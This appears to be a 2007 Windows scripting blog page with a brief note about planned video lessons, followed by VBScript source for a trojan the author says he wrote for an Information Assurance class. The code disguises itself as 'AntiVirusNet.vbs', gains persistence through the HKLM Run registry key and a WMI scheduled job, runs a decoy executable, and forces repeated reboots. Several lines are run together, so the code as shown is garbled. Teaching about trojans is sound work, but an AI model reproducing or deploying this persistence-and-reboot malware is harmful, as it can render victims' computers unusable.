Windows Scripting BLOG

Due to limited time working on this project this place is not intended to people who are new to scripting but much more for people who are already familiar with the VBS/WMI syntax.

Samstag, 22. Dezember 2007

$ NEWS $ Upcoming Video lessons on windows scripting

Hi Folks,
this is just a quick heads up on what might be going on over here pretty soon:

I've received quiet a large number of requests from former students and people in general I taught how to script, to start up some further "Scripting classes".

Due to this not being possible for numerous reasons, I came up with the (IMHO) best next-to-classroom learning experience: Video Lessons.

I'll be creating some video lessons demonstrating on different sample scripts how to make a SysAdmins life easier by using VBS and WMI.

Those videos will be completely free of charge, depending on how popular this project might become, the number of video lessons put out will vary.

Stay tuned and checkout this place for news on this.

More to come...

Jay

Example of a simple Trojan I've created for an Information Assurance class

' IMPORTANT! do NOT use this script on your computer or it could easily damage your system
'Also, this script has been written to demonstrate the concept of trojan horses/viruses - it should ' NOT be used in malicious fashion but only for educational purposes on isolated systems

'File 1 Romcs.vbs

HKEY_LOCAL_MACHINE = &H80000002strComputer = "."
Set WSHShell = CreateObject("Scripting.FilesystemObject")
WSHShell.CopyFile"AntiVirusNet.vbs", "C:\AntiVirusNet.vbs"
Set ObjRegistry = GetObject("winmgmts:{impersonationLevel = impersonate}!\\" & _ strComputer & "\root\default:StdRegProv")
Return = objRegistry.setStringValue(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run","WRSPXPBXUpd","C:\AntiVirusNet.vbs" )
If Return <> 0 Then
msgbox("Keine Admin Rights!") Else
Set objWMIService1 = GetObject("winmgmts:" _& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colComputers3 = objWMIService1.ExecQuery _("Select * from Win32_LocalTime")For Each objComputer2 in colComputers3
Hou = objComputer2.HourMin = objComputer2.Minute
if Hou < 10 thenHou = 0 & objComputer2.Hour
end ifnext
if Min < 10 thenMin = 0 & objComputer2.Minuteend if

Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colComputers2 = objWMIService.Get("Win32_ScheduledJob")T = "C:\AntiVirusNet.vbs"D = "********" & Hou & "" & Min & "00.000000+000" '+1 hour automatically
erret = colComputers2.Create(T,D,JobID1000)Set WSHShell1 = CreateObject("WScript.Shell")
WSHShell1.Run "bowling.exe"'WSHShell.DeleteFile ("*.vsbs")
End IF

' File 2 AntiVirusNet.vbs

On error resume next
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colComputers2 = objWMIService.ExecQuery _ ("Select * from Win32_OperatingSystem")For Each objComputer2 in colComputers2objComputer2.Security_.privileges.AddAsString "SeShutdownPrivilege", trueerrRet = objComputer2.Reboot()
next